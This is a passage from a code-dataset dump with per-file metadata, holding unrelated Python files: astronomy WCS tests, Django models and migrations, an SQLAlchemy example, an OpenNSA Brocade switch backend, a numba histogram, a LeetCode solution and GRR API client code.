ra1, dec1 = wcs.tran( numpy.array([ [x], [y] ]))
print 'Initial read of sipsample.fits:'
print 'error in ra = ',(ra1-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec1-true_dec) * 180.*3600./numpy.pi, 'arcsec'
# Now cycle through writing and reading to a file
hdu2 = pyfits.PrimaryHDU()
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False), "Encoding=FITS-WCS")
success = fc2.write(wcs)
print 'success = ',success
if not success:
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False))
success = fc2.write(wcs)
print 'Native encoding: success = ',success
fc2.writefits()
hdu2.writeto('test_sip.fits', clobber=True)
hdu3 = pyfits.open('test_sip.fits')[0]
fc3 = Ast.FitsChan(Atl.PyFITSAdapter(hdu3))
wcs3 = fc3.read()
ra3, dec3 = wcs3.tran( numpy.array([ [x], [y] ]))
print 'After write/read round trip through fits file:'
print 'error in ra = ',(ra3-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec3-true_dec) * 180.*3600./numpy.pi, 'arcsec'
| [
"[email protected]"
] | |
59c1f2b45d421f9c798635691acd2b8b721d41ce | 359f3d8a1a2b5524490c314a44d60cec1d06f658 | /whoweb/search/migrations/0016_remove_searchexportpage_limit.py | a6429e3520d3cf0c0d99c344ac8bb8c2cec16767 | [] | no_license | sivasuriyangithub/Merket_Intellect-s3.route | ec9d9aa7d4575d5ff8006e1454f69e4033193fc0 | 71a9ab642f9a31f4a318cebec7fe6a075870a83c | refs/heads/master | 2023-08-25T13:51:02.116705 | 2021-10-19T01:06:49 | 2021-10-19T01:06:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # Generated by Django 2.2.8 on 2020-02-10 02:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("search", "0015_auto_20200210_0233"),
]
operations = [
migrations.RemoveField(model_name="searchexportpage", name="limit",),
]
| [
"[email protected]"
] | |
9ab4170d522046aa76f5bf39f8cae94eaa54c710 | dd87109f806b31ddd065b51162e4e3ddc167151f | /select_sqlalchemy.py | 1ef7bac6df4eff93502b857a0cf97d7e3f2c2689 | [] | no_license | articuly/operation_practice | 9776caeb9a039a72d008fc312b1134f7e2c18394 | d4d4452e4174e6b8d7cc834f29452c08f304c719 | refs/heads/master | 2021-05-26T04:03:12.489849 | 2021-01-26T12:24:35 | 2021-01-26T12:24:35 | 254,045,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | from sqlalchemy import create_engine, Column, Integer, String, Enum
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# Create the database engine, connecting to the MySQL database via PyMySQL
engine = create_engine('mysql+pymysql://root:123456@localhost/mycms')
# Create the session factory, bound to the engine created above
Session = sessionmaker(bind=engine)
# Create a session instance
session = Session()
# Base is the declarative base class for the ORM mappings
Base = declarative_base()
# Mapping for the database table
class Users(Base):
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(String(32))
realname = Column(String(32))
password = Column(String(32))
age = Column(Integer)
city = Column(String(32))
if __name__ == '__main__':
res = session.query(Users, Users.username, Users.realname).filter(Users.username.like("py%")).limit(50).all()
print(res)
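    # Illustrative sketch (added; assumes the hard-coded MySQL instance above
    # is reachable): create the table and insert a row before querying.
    # Base.metadata.create_all(engine)
    # session.add(Users(username='pyuser', realname='Py User', password='secret',
    #                   age=30, city='Beijing'))
    # session.commit()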
| [
"[email protected]"
] | |
3fcd3ecb6a4ec8ef84a4547a9ff3b96cc2bc5142 | 88bd71afeb581578c9c0d29c08b38a9ed1c00ffb | /house/views.py | 7e22d0ac99a0b75f5279554ee7e962e5af0bfc86 | [] | no_license | lopezjronald/DjangoRealEstateInvestmentProject | 019b5c763a5839b920a9abf823c9feb1e9fde0f8 | 6347e2a60e48915333700c182bb4143166cfb8f1 | refs/heads/master | 2022-12-04T18:38:17.609092 | 2020-08-28T00:50:23 | 2020-08-28T00:50:23 | 290,914,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from django.shortcuts import render
from .models import Project
def house(request):
projects = Project.objects.all()
return render(request, 'house/home.html', {'projects': projects})
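# Illustrative wiring sketch (added; the project's actual urls.py is not shown,
# so the pattern below is an assumption):
# from django.urls import path
# from . import views
# urlpatterns = [path('', views.house, name='house')]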
| [
"[email protected]"
] | |
fa284df700e5a99c1ad7f73156e6a6cfb14a4ef6 | c61802907bb274c999a6815a072336de977e65e9 | /opennsa/backends/brocade.py | 2e9860ec78d9b0f606ca23ee5b8ca96a718d3e9f | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | NORDUnet/opennsa | 2f8039fa4702a8126e2e0cdc4bc6b56b4389c494 | 9d47b29037e5f9a159e7984eb17b4d3aeaf1708c | refs/heads/master | 2023-07-22T22:36:44.864169 | 2022-10-06T13:18:08 | 2022-10-06T13:18:08 | 10,215,733 | 16 | 24 | BSD-3-Clause | 2022-10-06T13:08:44 | 2013-05-22T08:50:54 | Python | UTF-8 | Python | false | false | 8,035 | py | """
Brocade backend.
Contributed by Balasubramania Pillai from MAX Gigapop.
Ported to OpenNSA NSIv2 by Henrik Thostrup Jensen (summer 2013)
Further contributions/fixes from Jeronimo Aguiar from AMPATH.
Further contributions by John Hess from CENIC.
Notes:
configure terminal
vlan $vlan_id name $name
tagged $source_port
tagged $dest_port
end
Teardown:
configure terminal
no vlan $vlan_id
end
"""
import string
import random
from twisted.python import log
from twisted.internet import defer
from opennsa import constants as cnt, config
from opennsa.backends.common import ssh, genericbackend
LOG_SYSTEM = 'opennsa.brocade'
COMMAND_PRIVILEGE = 'enable %s'
COMMAND_CONFIGURE = 'configure terminal'
COMMAND_END = 'end'
COMMAND_VLAN = 'vlan %(vlan)i name %(name)s'
#COMMAND_TAGGED = 'tagged %(port)s'
COMMAND_TAGGED = 'tagged ethernet %(port)s'
COMMAND_NO_VLAN = 'no vlan %(vlan)i'
def _portToInterfaceVLAN(nrm_port):
port, vlan = nrm_port.split('.')
vlan = int(vlan)
return port, vlan
def _createSetupCommands(source_nrm_port, dest_nrm_port):
log.msg('_createSetupCommands: src %s dst %s' % (source_nrm_port, dest_nrm_port))
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
log.msg('_createSetupCommands: src %s %s dst %s %s' % (s_port, s_vlan, d_port, d_vlan))
name = 'opennsa-%i' % s_vlan
cmd_vlan = COMMAND_VLAN % { 'vlan' : s_vlan, 'name' : name }
cmd_s_intf = COMMAND_TAGGED % { 'port' : s_port }
cmd_d_intf = COMMAND_TAGGED % { 'port' : d_port }
commands = [ cmd_vlan, cmd_s_intf, cmd_d_intf ]
log.msg('_createSetupCommands: commands %s' % (commands))
return commands
def _createTeardownCommands(source_nrm_port, dest_nrm_port):
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
cmd_no_intf = COMMAND_NO_VLAN % { 'vlan' : s_vlan }
commands = [ cmd_no_intf ]
return commands
class SSHChannel(ssh.SSHChannel):
name = b'session'
def __init__(self, conn):
ssh.SSHChannel.__init__(self, conn=conn)
self.data = b''
self.wait_defer = None
self.wait_data = None
@defer.inlineCallbacks
def sendCommands(self, commands, enable_password):
LT = '\r' # line termination
try:
log.msg('Requesting shell for sending commands', debug=True, system=LOG_SYSTEM)
yield self.conn.sendRequest(self, 'shell', b'', wantReply=1)
d = self.waitForData(b'>')
self.write(COMMAND_PRIVILEGE % enable_password + LT)
yield d
log.msg('Entered privileged mode', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_CONFIGURE + LT)
yield d
log.msg('Entered configure mode', debug=True, system=LOG_SYSTEM)
for cmd in commands:
log.msg('CMD> %s' % cmd, debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(cmd + LT)
yield d
# not quite sure how to handle failure here
log.msg('Commands send, sending end command.', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_END + LT)
yield d
except Exception as e:
log.msg('Error sending commands: %s' % str(e))
raise e
log.msg('Commands successfully send', debug=True, system=LOG_SYSTEM)
self.sendEOF()
self.closeIt()
def waitForData(self, data):
self.wait_data = data
self.wait_defer = defer.Deferred()
return self.wait_defer
def dataReceived(self, data):
if len(data) == 0:
pass
else:
self.data += data
if self.wait_data and self.wait_data in self.data:
d = self.wait_defer
self.data = b''
self.wait_data = None
self.wait_defer = None
d.callback(self)
class BrocadeCommandSender:
def __init__(self, host, port, ssh_host_fingerprint, user, ssh_public_key_path, ssh_private_key_path, enable_password):
self.ssh_connection_creator = \
ssh.SSHConnectionCreator(host, port, [ ssh_host_fingerprint ], user, ssh_public_key_path, ssh_private_key_path)
self.enable_password = enable_password
@defer.inlineCallbacks
def sendCommands(self, commands):
# Open a connection for each request
# This is done due to the code being based on the Force10 backend
# It is currently unknown if the Brocade SSH implementation
# supports multiple ssh channels.
log.msg('Creating new SSH connection', debug=True, system=LOG_SYSTEM)
ssh_connection = yield self.ssh_connection_creator.getSSHConnection()
try:
channel = SSHChannel(conn=ssh_connection)
ssh_connection.openChannel(channel)
yield channel.channel_open
yield channel.sendCommands(commands, self.enable_password)
finally:
ssh_connection.transport.loseConnection()
class BrocadeConnectionManager:
def __init__(self, log_system, port_map, cfg):
self.log_system = log_system
self.port_map = port_map
host = cfg[config.BROCADE_HOST]
port = cfg.get(config.BROCADE_PORT, 22)
host_fingerprint = cfg[config.BROCADE_HOST_FINGERPRINT]
user = cfg[config.BROCADE_USER]
ssh_public_key = cfg[config.BROCADE_SSH_PUBLIC_KEY]
ssh_private_key = cfg[config.BROCADE_SSH_PRIVATE_KEY]
enable_password = cfg[config.BROCADE_ENABLE_PASSWORD]
self.command_sender = BrocadeCommandSender(host, port, host_fingerprint, user, ssh_public_key, ssh_private_key, enable_password)
def getResource(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return str(label.labelValue())
def getTarget(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return self.port_map[port] + '.' + label.labelValue()
def createConnectionId(self, source_target, dest_target):
return 'B-' + ''.join( [ random.choice(string.hexdigits[:16]) for _ in range(10) ] )
def canSwapLabel(self, label_type):
return False
def setupLink(self, connection_id, source_target, dest_target, bandwidth):
def linkUp(pt):
log.msg('Link %s -> %s up' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createSetupCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkUp)
return d
def teardownLink(self, connection_id, source_target, dest_target, bandwidth):
def linkDown(pt):
log.msg('Link %s -> %s down' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createTeardownCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkDown)
return d
def BrocadeBackend(network_name, nrm_ports, parent_requester, configuration):
name = 'Brocade %s' % network_name
nrm_map = dict( [ (p.name, p) for p in nrm_ports ] ) # for the generic backend
port_map = dict( [ (p.name, p.interface) for p in nrm_ports ] ) # for the nrm backend
cm = BrocadeConnectionManager(name, port_map, configuration)
return genericbackend.GenericBackend(network_name, nrm_map, cm, parent_requester, name)
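# --- illustrative sketch (added; not part of the backend) ---
# The command builders are pure functions, so they can be exercised without a
# switch; the port names and VLAN below are made up.
if __name__ == '__main__':
    for cmd in _createSetupCommands('1/1.1701', '1/2.1701'):
        print(cmd)
    for cmd in _createTeardownCommands('1/1.1701', '1/2.1701'):
        print(cmd)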
| [
"[email protected]"
] | |
fdd4638884d947455012f888f979014d61edaff5 | 8e328e186da6c5bb12c35c72a967ab73be97d6c5 | /CSMWeb/models.py | 50a3d4cb6e83c4946df1b2340bafec3794e70140 | [] | no_license | PaloAltoCSM/CSM | 48bef57a7db0e623deec60d66e3e5dc4470354e9 | dd4aaeada040df8e199e9efcea779bef45bbbdb1 | refs/heads/master | 2021-01-01T16:30:04.794114 | 2015-08-15T01:46:29 | 2015-08-15T01:46:29 | 40,500,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
class Tag(models.Model):
text = models.CharField(max_length=100, primary_key=True)
def __str__(self):
return "Tag #%s" % (self.text)
class Project(models.Model):
name = models.CharField(max_length=100, primary_key=True)
title = models.CharField(max_length=200, blank=True)
description = models.TextField(blank=True)
members = models.ManyToManyField(User, related_name='projmembers')
followers = models.ManyToManyField(User, related_name='projfollowers')
# tags
tags = models.ManyToManyField(Tag)
    def getDict(self):
        # `name` is the primary key, so use the generic `pk` alias; there is no `id` field
        return {'id': self.pk, 'title': self.title, 'description': self.description}
def __unicode__(self):
return "Project #%s" % (self.name)
| [
"[email protected]"
] | |
5a7783237e226747e5fbd25cac84df4b45ef3159 | 4a74875c7366a19b7189fcb89fa0fa27abc4309e | /data_pipeline/processor/processor.py | b6493e1c2048911a74ea00ba33661a7c5fd2dae6 | [
"Apache-2.0"
] | permissive | saubury-iag/data_pipeline | d865d66d25eeb4ea6c6a655ae934bfe83c0efa06 | 4ad04198ed48c643045113c6e2c3e0848adbdec6 | refs/heads/master | 2021-07-23T08:43:46.754162 | 2017-11-01T05:05:23 | 2017-11-01T05:05:23 | 108,808,749 | 0 | 0 | null | 2017-10-30T06:06:41 | 2017-10-30T06:06:41 | null | UTF-8 | Python | false | false | 1,726 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: cdc_processor
# Purpose: Processes CDCs polled from Kafka queue
#
# Notes:
#
###############################################################################
import logging
from abc import ABCMeta, abstractmethod
class Processor(object):
__metaclass__ = ABCMeta
def __init__(self):
self._set_logger()
def _set_logger(self):
self._logger = logging.getLogger(__name__)
def renew_workdirectory(self):
self._set_logger()
@abstractmethod
def deserialise(self):
pass
@abstractmethod
def process(self, stream_message):
"""Process CDC messsage into a statement
:param dict stream_message: Stream message payload polled from queue
:return: Statement object representing the statement to apply to target
:rtype: Statement
"""
pass
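# --- illustrative sketch (added; not part of the original module) ---
# A minimal concrete Processor; the message handling is an assumption.
class EchoProcessor(Processor):
    def deserialise(self):
        pass

    def process(self, stream_message):
        # echo the polled payload back as the resulting "statement"
        self._logger.debug("processing %s", stream_message)
        return stream_message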
| [
"[email protected]"
] | |
244537803eabece33bf150b7a3e93cf37db117cb | b0eef0efd10556a4b054574fdd2d43124cb0856b | /npbench/benchmarks/azimint_hist/azimint_hist_numba_np.py | a59941dc12823543eda3a331f4260532d55b9226 | [
"BSD-3-Clause"
] | permissive | learning-chip/npbench | 140d38be2095b54393de6e0008264b54b7cf686b | f2f545afe3603d5c8f1771f26d660f25ce4a3cda | refs/heads/main | 2023-05-10T09:54:52.719759 | 2021-05-31T12:09:48 | 2021-05-31T12:09:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,291 | py | # Copyright 2014 Jérôme Kieffer et al.
# This is an open-access article distributed under the terms of the
# Creative Commons Attribution License, which permits unrestricted use,
# distribution, and reproduction in any medium, provided the original author
# and source are credited.
# http://creativecommons.org/licenses/by/3.0/
# Jérôme Kieffer and Giannis Ashiotis. Pyfai: a python library for
# high performance azimuthal integration on gpu, 2014. In Proceedings of the
# 7th European Conference on Python in Science (EuroSciPy 2014).
# BSD 2-Clause License
# Copyright (c) 2017, Numba
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import numba as nb
@nb.jit(nopython=True, parallel=True, fastmath=True)
def get_bin_edges_parallel(a, bins):
bin_edges = np.zeros((bins + 1, ), dtype=np.float64)
a_min = a.min()
a_max = a.max()
delta = (a_max - a_min) / bins
for i in range(bin_edges.shape[0]):
bin_edges[i] = a_min + i * delta
bin_edges[-1] = a_max # Avoid roundoff error on last point
return bin_edges
@nb.jit(nopython=True, fastmath=True)
def compute_bin(x, bin_edges):
# assuming uniform bins for now
n = bin_edges.shape[0] - 1
a_min = bin_edges[0]
a_max = bin_edges[-1]
# special case to mirror NumPy behavior for last bin
if x == a_max:
return n - 1 # a_max always in last bin
return int(n * (x - a_min) / (a_max - a_min))
@nb.jit(nopython=True, parallel=True, fastmath=True)
def histogram_parallel(a, bins, weights):
hist = np.zeros((bins, ), dtype=a.dtype)
bin_edges = get_bin_edges_parallel(a, bins)
for i in range(a.shape[0]):
        bin_idx = compute_bin(a[i], bin_edges)  # avoid shadowing the builtin `bin`
        hist[bin_idx] += weights[i]
return hist, bin_edges
@nb.jit(nopython=True, parallel=True, fastmath=True)
def azimint_hist(data, radius, npt):
histu = np.histogram(radius, npt)[0]
# histw = np.histogram(radius, npt, weights=data)[0]
histw = histogram_parallel(radius, npt, weights=data)[0]
return histw / histu
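# --- illustrative usage sketch (added; not part of the benchmark) ---
# Assumes a recent NumPy (default_rng) and that numba can compile these
# kernels locally, as in the npbench harness.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    data = rng.random(10000)
    radius = rng.random(10000)
    print(azimint_hist(data, radius, 100)[:5])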
| [
"[email protected]"
] | |
b07b16db3d774aac0bbdc84ffbfe276598532c9b | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/414.Third Maximum Number.py | ca03468944b1979e12857f95f61398921bb8c3d2 | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,215 | py | # Given a non-empty array of integers, return the third maximum number in this
# array. If it does not exist, return the maximum number. The time complexity must
# be in O(n).
#
# Example 1:
#
# Input: [3, 2, 1]
#
# Output: 1
#
# Explanation: The third maximum is 1.
#
#
#
# Example 2:
#
# Input: [1, 2]
#
# Output: 2
#
# Explanation: The third maximum does not exist, so the maximum (2) is returned
# instead.
#
#
#
# Example 3:
#
# Input: [2, 2, 3, 1]
#
# Output: 1
#
# Explanation: Note that the third maximum here means the third maximum distinct
# number.
# Both numbers with value 2 are both considered as second maximum.
#
# Related Topics Array
# 👍 836 👎 1515
# region time
# 2020-12-30 23:36:42
# endregion
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def thirdMax(self, nums) -> int:
nums = list(set(nums))
if len(nums) < 3:
return max(nums)
nums.sort(reverse=True)
return nums[2]
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
# n = [3, 2, 1]
# n = [2, 2, 3, 1]
n = [1, 1, 2]
print(Solution().thirdMax(n))
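# --- O(n) alternative sketch (added; not in the original solution) ---
# A single pass tracks the top three distinct values without sorting, which
# matches the O(n) bound the problem statement asks for.
def third_max_linear(nums):
    first = second = third = None
    for x in nums:
        if x in (first, second, third):
            continue
        if first is None or x > first:
            first, second, third = x, first, second
        elif second is None or x > second:
            second, third = x, second
        elif third is None or x > third:
            third = x
    return first if third is None else third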
| [
"[email protected]"
] | |
7516852dd574508330178cbc13a9ed763a228644 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /MtktG9Dz7z9vBCFYM_1.py | b19055d28322e4de6c3ee44a3d7684ed9c0daf4d | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | """
Write a function that takes an IP address and returns the domain name using
PTR DNS records.
### Example
get_domain("8.8.8.8") ➞ "dns.google"
get_domain("8.8.4.4") ➞ "dns.google"
### Notes
* You may want to import `socket`.
* Don't cheat and just print the domain name, you need to make a real DNS request.
* Return as a string.
"""
import socket as sk
def get_domain(ip_address):
return sk.getfqdn(sk.gethostbyaddr(ip_address)[0])
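# Illustrative usage (added): resolving Google's public DNS address; this
# performs a real reverse-DNS lookup, so it needs network access.
# print(get_domain("8.8.8.8"))  # -> "dns.google"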
| [
"[email protected]"
] | |
95e1625f25d743050cb651088f93e69da0459865 | e0d404675839dc10bc1e995be4c35a69ab9133a5 | /api_client/python/grr_api_client/config.py | 18fe1aba06e22f8e98221caa6d7e3312da7a36a9 | [
"Apache-2.0"
] | permissive | feitianyiren/grr | 4afebc4a1912d46b4df4f1b4b0d25500505d05e5 | 9cc014f44ea9b21166e3b6815eb218d39f37fa07 | refs/heads/master | 2020-04-09T02:53:22.199635 | 2018-11-28T10:54:52 | 2018-11-28T10:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | #!/usr/bin/env python
"""Functions and objects to access config-related GRR API methods."""
from __future__ import absolute_import
from __future__ import unicode_literals
from grr_api_client import utils
from grr_response_proto.api import config_pb2
class GrrBinaryBase(object):
"""Base class for GrrBinary references and objects."""
def __init__(self, binary_type=None, path=None, context=None):
super(GrrBinaryBase, self).__init__()
if not binary_type:
raise ValueError("binary_type can't be empty")
if not path:
raise ValueError("path can't be empty")
if not context:
raise ValueError("context can't be empty")
self.binary_type = binary_type
self.path = path
self._context = context
def Get(self):
args = config_pb2.ApiGetGrrBinaryArgs(type=self.binary_type, path=self.path)
data = self._context.SendRequest("GetGrrBinary", args)
return GrrBinary(data=data, context=self._context)
def GetBlob(self):
args = config_pb2.ApiGetGrrBinaryBlobArgs(
type=self.binary_type, path=self.path)
return self._context.SendStreamingRequest("GetGrrBinaryBlob", args)
class GrrBinaryRef(GrrBinaryBase):
"""GRR binary reference (points to one, but has no data)."""
class GrrBinary(GrrBinaryBase):
"""GRR binary object with fetched data."""
def __init__(self, data=None, context=None):
if data is None:
raise ValueError("data can't be None")
super(GrrBinary, self).__init__(
binary_type=data.type, path=data.path, context=context)
self.data = data
def ListGrrBinaries(context=None):
"""Lists all registered Grr binaries."""
items = context.SendIteratorRequest("ListGrrBinaries", None)
return utils.MapItemsIterator(
lambda data: GrrBinary(data=data, context=context), items)
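# --- illustrative sketch (added; not part of this module) ---
# `context` normally comes from the top-level API object; the endpoint below
# is made up.
# import grr_api_client.api
# grrapi = grr_api_client.api.InitHttp(api_endpoint="http://localhost:8000")
# for binary in ListGrrBinaries(context=grrapi._context):
#   print(binary.data.path)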
| [
"[email protected]"
] | |
384f2c32d83751bbaee4e8bf82c84cbdb8560799 | db1592ee9ba472d2a2f94056ac32b255deb69ecd | /hog/api/migrations/0007_auto_20190618_1648.py | 03bfdfd56703771d235c0fe8b69f4fc89eb337bf | [] | no_license | tech4nature/hogapp | 3fadcad8353dd2cecdc97eff87d0f196e144a2f5 | 24d50c9756853534e1dafdccbf3609fd512f253a | refs/heads/main | 2023-03-07T00:45:53.100651 | 2022-07-09T13:00:16 | 2022-07-09T13:00:16 | 175,845,744 | 1 | 0 | null | 2023-02-15T19:58:09 | 2019-03-15T15:27:33 | Python | UTF-8 | Python | false | false | 1,182 | py | # Generated by Django 2.1.7 on 2019-06-18 16:48
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('api', '0006_location_coords'),
]
operations = [
migrations.AddField(
model_name='measurement',
name='video_poster',
field=models.FileField(blank=True, null=True, upload_to='posters'),
),
migrations.AlterField(
model_name='hog',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
migrations.AlterField(
model_name='location',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
]
| [
"[email protected]"
] | |
ed2d8e730e1f68799c443568132b6b04df8ed6f2 | 9f884a3584eef771f8c010e296c5d763098be243 | /povary/apps/recipes/urls.py | 8e69a1a748b52fe7ca90910cd8edfb48e5a05e85 | [
"BSD-3-Clause"
] | permissive | TorinAsakura/cooking | fc8658ce2ac21c2e00dc307399a5fa24971a20c1 | cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a | refs/heads/master | 2023-01-24T13:07:38.529811 | 2020-12-08T22:14:33 | 2020-12-08T22:14:33 | 319,773,012 | 0 | 0 | BSD-3-Clause | 2020-12-08T22:14:34 | 2020-12-08T22:08:34 | null | UTF-8 | Python | false | false | 1,408 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from recipes.views import RecipeWizard
from recipes.forms import RecipeFormStep1, RecipeFormStep2, RecipeFormStep3, IngredientForm
from django.forms.formsets import formset_factory
FORMS = [("first", RecipeFormStep1),
("second", formset_factory(IngredientForm)),
("third", RecipeFormStep3)]
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'povary.views.home', name='home'),
# url(r'^povary/', include('povary.foo.urls')),
url(r'add_recipe_to_box/(?P<recipe_slug>.*)/$', 'recipes.views.add_recipe_to_box', name='add_recipe_to_box'),
url(r'^$', 'recipes.views.recipe_list', name='recipe_list'),
url(r'^add/$', RecipeWizard.as_view(FORMS), name="recipe-add"),
url(r'^cakes/$', 'recipes.views.cake_recipe_list', name='cake_recipe_list'),
# url(r'^categories/(?P<category_slug>.*)/(?P<subcategory_slug>.*)/$',
# 'recipes.views.subcategory_details',
# name='subcategory_details'),
# url(r'^categories/(?P<category_slug>.*)/$', 'recipes.views.category_details', name='category_details'),
url(r'^ajax/(?P<recipe_slug>.*)/set_portion/$', 'recipes.views.set_portion', name='set_portion'),
url(r'^ajax/(?P<recipe_slug>.*)/wish/$', 'recipes.views.wish', name='wish'),
url(r'^(?P<recipe_slug>.*)/$', 'recipes.views.recipe_details', name='recipe_details'),
)
| [
"[email protected]"
] | |
9068990897aab8e31bc3528c0d1e5e71e9ac3716 | ded13e921c8365c6113911a5834969ec3d33f989 | /190/Reverse Bits.py | daf8020e90da61121938b47c386e6a71c42cebc4 | [] | no_license | ArrayZoneYour/LeetCode | b7b785ef0907640623e5ab8eec1b8b0a9d0024d8 | d09f56d4fef859ca4749dc753d869828f5de901f | refs/heads/master | 2021-04-26T23:03:10.026205 | 2018-05-09T15:49:08 | 2018-05-09T15:49:08 | 123,922,098 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # /usr/bin/python
# coding: utf-8
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bit_list = []
for i in range(32):
if n == 0:
bit_list.append(0)
else:
bit_list.append(n % 2)
n //= 2
size = 1
result = 0
for bit in bit_list[::-1]:
if bit != 0:
result += bit * size
size *= 2
return result
print(Solution().reverseBits(43261596))
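# --- bit-shift alternative sketch (added; not in the original file) ---
# Builds the reversed word one bit at a time with shifts instead of a digit list.
class ShiftSolution:
    # @param n, an integer
    # @return an integer
    def reverseBits(self, n):
        result = 0
        for _ in range(32):
            result = (result << 1) | (n & 1)
            n >>= 1
        return result

print(ShiftSolution().reverseBits(43261596))  # 964176192, same as above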
| [
"[email protected]"
] | |
